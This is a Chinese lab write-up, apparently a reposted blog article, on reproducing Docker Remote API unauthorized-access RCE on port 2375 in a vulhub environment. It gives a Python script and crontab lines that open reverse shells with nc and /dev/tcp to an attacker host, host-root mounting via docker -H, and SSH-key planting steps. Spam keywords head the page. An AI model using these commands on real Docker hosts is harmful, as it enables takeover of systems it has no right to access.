国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

這篇具有很好參考價(jià)值的文章主要介紹了漏洞復(fù)現(xiàn)-docker-unauthorized-rce。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

目錄

一、漏洞介紹

1.1漏洞成因

2.2環(huán)境準(zhǔn)備

二、漏洞檢測

三、漏洞利用

1.腳本利用

2.定時(shí)任務(wù)反彈shell

3. 寫ssh公鑰獲取shell


一、漏洞介紹

1.1漏洞成因

? ? ? ? docker remote API未授權(quán)訪問漏洞,此API主要目的是取代命令執(zhí)行頁面,開放2375監(jiān)聽容器時(shí),會(huì)調(diào)用這個(gè)API。方便docker集群管理和擴(kuò)展

2.2環(huán)境準(zhǔn)備

????????靶機(jī)環(huán)境:192.168.xx.xxx?(ubuntu)

????????攻擊環(huán)境:192.168.xx.xxx?(kali)

????????在靶機(jī)上使用vulhub復(fù)現(xiàn)漏洞環(huán)境。

????????vulhub官網(wǎng)地址:https://vulhub.org

cd /vulhub/docker/unauthorized-rce
docker-compose build
docker-compose up -d

二、漏洞檢測

直接輸入地址?http://your-ip:2375/version?;若能訪問,證明存在未授權(quán)訪問漏洞。

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

三、漏洞利用

1.腳本利用

在kali上安裝docker環(huán)境

apt-get install docker docker-compose
service docker start

?在kali上開啟nc監(jiān)聽本地1111端口,用來接收反彈的Shell

nc -l -p 1111

使用Docker隨意啟動(dòng)一個(gè)容器,并將宿主機(jī)的 /etc 目錄掛載到容器中,便可以任意讀寫文件了??梢詫⒚顚懭?crontab 配置文件,進(jìn)行反彈shell。

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

然后執(zhí)行 python 腳本反彈Shell給Kali主機(jī)的1111端口

python docker-hack.py

執(zhí)行完腳本,耐心等待一會(huì)才會(huì)反彈shell到kali主機(jī),大約一分多鐘時(shí)間。

我最后沒彈出來shell-尷尬

2.定時(shí)任務(wù)反彈shell

docker -H tcp://x.x.x.x:2375 images 

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

(1)能看到宿主機(jī)的鏡像,說明漏洞存在

(2)開始利用:

列出當(dāng)前所有鏡像

docker -H 192.168.xxx.xxx:2375 images?

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

列出當(dāng)前所有容器

docker -H 192.168.xxx.xxx:2375 ps -a?

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

在宿主機(jī)上啟動(dòng)docker容器:

 docker -H tcp://x.x.x.x:2375 run -it -v /:/mnt e66264b98777 /bin/bash        (113a43faa138為images ID )
 docker -H tcp://x.x.x.x:2375 run -it -v /:/mnt e66264b98777 /bin/sh        (113a43faa138為images ID )

這條命令的意思是啟動(dòng)一個(gè)image ID?為e66264b98777的容器,并且將該宿主機(jī)的根目錄掛在到容器的/mnt目錄下

啟動(dòng)之后就會(huì)獲得該容器宿主機(jī)的shell:

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

?crontab -e 寫入定時(shí)任務(wù)

***** /bin/sh -i >& /dev/tcp/xxx.xxx.xxx.xxx./1234 0>&1

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

3. 寫ssh公鑰獲取shell

在攻擊者得v屁s上生成一對公私鑰

>>ssh-keygen -t rsa
>>輸入密鑰名
>>輸入密碼

查看并復(fù)制服務(wù)器公鑰

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

進(jìn)入到victim掛在的目錄下(/mnt/root)

漏洞復(fù)現(xiàn)-docker-unauthorized-rce

進(jìn)入.ssh目錄,查看是否有公鑰存在(如果有則將之前的公鑰進(jìn)行重定向覆蓋)

漏洞復(fù)現(xiàn)-docker-unauthorized-rce文章來源地址http://www.zghlxwxcb.cn/news/detail-493097.html

到了這里,關(guān)于漏洞復(fù)現(xiàn)-docker-unauthorized-rce的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    ? ? ?Hessian是二進(jìn)制的web service協(xié)議,官方對Java、Flash/Flex、Python、C++、.NET C#等多種語言都進(jìn)行了實(shí)現(xiàn)。Hessian和Axis、XFire都能實(shí)現(xiàn)web service方式的遠(yuǎn)程方法調(diào)用,區(qū)別是Hessian是二進(jìn)制協(xié)議,Axis、XFire則是SOAP協(xié)議,所以從性能上說Hessian遠(yuǎn)優(yōu)于后兩者,并且Hessian的JAVA使用方法非

    2024年02月11日
    瀏覽(35)
  • ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)

    ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)

    ThinkPHP3.2遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞產(chǎn)生原因是由于在業(yè)務(wù)代碼中如果對模板賦值方法assign的第一個(gè)參數(shù)可控,則導(dǎo)致模板路徑變量被覆蓋為攜帶攻擊代碼路徑,造成文件包含,代碼執(zhí)行等危害。 復(fù)現(xiàn)環(huán)境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10 一、 搭建環(huán)境: 在ThinkPHP的

    2023年04月08日
    瀏覽(21)
  • CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個(gè)專業(yè)的企業(yè)知識(shí)管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識(shí)庫并建立知識(shí)管理流程,也可以用于構(gòu)建企業(yè)wiki。其使用簡單,但它強(qiáng)大的編輯和站點(diǎn)管理特征能夠幫助團(tuán)隊(duì)成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • 【漏洞復(fù)現(xiàn)】Fastjson_1.2.47_rce

    【漏洞復(fù)現(xiàn)】Fastjson_1.2.47_rce

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請遵守有關(guān)法律法規(guī) 說明 內(nèi)容 漏洞編號 漏洞名稱 Fastjson_1.2.47_遠(yuǎn)程執(zhí)行漏洞 漏洞評級 影響范圍 漏洞描述 修復(fù)方案 1.1、漏洞描述 Fastjson是阿里巴巴公司開源的一款json解析器,其性能優(yōu)越,被廣泛應(yīng)用于各大廠商的Java項(xiàng)目

    2024年02月05日
    瀏覽(19)
  • CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一個(gè)基礎(chǔ)開源框架,其目的是用于簡化 Java 企業(yè)級應(yīng)用的開發(fā)難度和開發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報(bào)告,Spring Framework存在遠(yuǎn)程代碼執(zhí)行漏洞,在 JDK 9+ 上運(yùn)行的 Spring MVC 或 Spring WebFlux 應(yīng)用程序可能容易受到通過數(shù)據(jù)綁定的遠(yuǎn)程代碼執(zhí)行

    2023年04月21日
    瀏覽(26)
  • IP-guard WebServer RCE漏洞復(fù)現(xiàn)

    ? ?IP-guard是由溢信科技股份有限公司開發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡化IT系統(tǒng)管理。 ?漏洞成因 ? ? 在Web應(yīng)用程序的實(shí)現(xiàn)中,參數(shù)的處理和驗(yàn)證是確保應(yīng)用安全的關(guān)鍵環(huán)節(jié)。然而,當(dāng)參數(shù)處理不當(dāng)時(shí),就會(huì)出現(xiàn)安

    2024年02月05日
    瀏覽(22)
  • Apache ActiveMQ RCE漏洞復(fù)現(xiàn)(CNVD-2023-69477)

    Apache ActiveMQ RCE漏洞復(fù)現(xiàn)(CNVD-2023-69477)

    ??ActiveMQ是一個(gè)開源的消息代理和集成模式服務(wù)器,它支持Java消息服務(wù)(JMS) API。它是Apache Software Foundation下的一個(gè)項(xiàng)目,用于實(shí)現(xiàn)消息中間件,幫助不同的應(yīng)用程序或系統(tǒng)之間進(jìn)行通信。 ?Apache ActiveMQ 中存在遠(yuǎn)程代碼執(zhí)行漏洞,Apache ActiveMQ在默認(rèn)安裝下開放了61616服務(wù)端口,

    2024年02月08日
    瀏覽(26)
  • Fortinet FortiNAC RCE漏洞復(fù)現(xiàn)(CVE-2022-39952)

    ? ? ? FortiNAC(Network Access Control) 是Fortinet的一種零信任網(wǎng)絡(luò)訪問控制解決方案,可增強(qiáng)用戶對企業(yè)網(wǎng)絡(luò)上的物聯(lián)網(wǎng) (IoT) 設(shè)備的監(jiān)控。NAC 是零信任網(wǎng)絡(luò)訪問安全模型的重要組成部分,在該模型中,IT 團(tuán)隊(duì)可以輕松了解正在訪問網(wǎng)絡(luò)的人員和設(shè)備,以及如何保護(hù)網(wǎng)絡(luò)內(nèi)外的公司資

    2024年02月06日
    瀏覽(23)
  • SpringBoot-Eureka-xstream-rce漏洞復(fù)現(xiàn)

    SpringBoot-Eureka-xstream-rce漏洞復(fù)現(xiàn)

    actuator 是 springboot 提供的用來對應(yīng)用系統(tǒng)進(jìn)行自省和監(jiān)控的功能模塊。其提供的執(zhí)行器端點(diǎn)分為兩類:原生端點(diǎn)和用戶自定義擴(kuò)展端點(diǎn),原生端點(diǎn)主要有: 漏洞利用 1.利用trace,獲取認(rèn)證信息(Cookie、tooken、Session),利用認(rèn)證信息訪問接口 訪問/trace端點(diǎn)獲取基本的 HTTP 請求

    2024年01月20日
    瀏覽(20)
  • NUUO網(wǎng)絡(luò)攝像頭(NVR)RCE漏洞復(fù)現(xiàn)

    NUUO網(wǎng)絡(luò)攝像頭(NVR)RCE漏洞復(fù)現(xiàn)

    NUUO Network Video Recorder(NVR)是中國臺(tái)灣NUUO公司的一款網(wǎng)絡(luò)視頻記錄器。 NUUO NVR視頻存儲(chǔ)管理設(shè)備的__debugging_center_utils___.php文件存在未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞,攻擊者可在沒有任何權(quán)限的情況下通過log參數(shù)執(zhí)行任意命令。 FOFA語法: title=\\\"Network Video Recorder Login\\\" 訪問頁面如下,

    2024年02月05日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包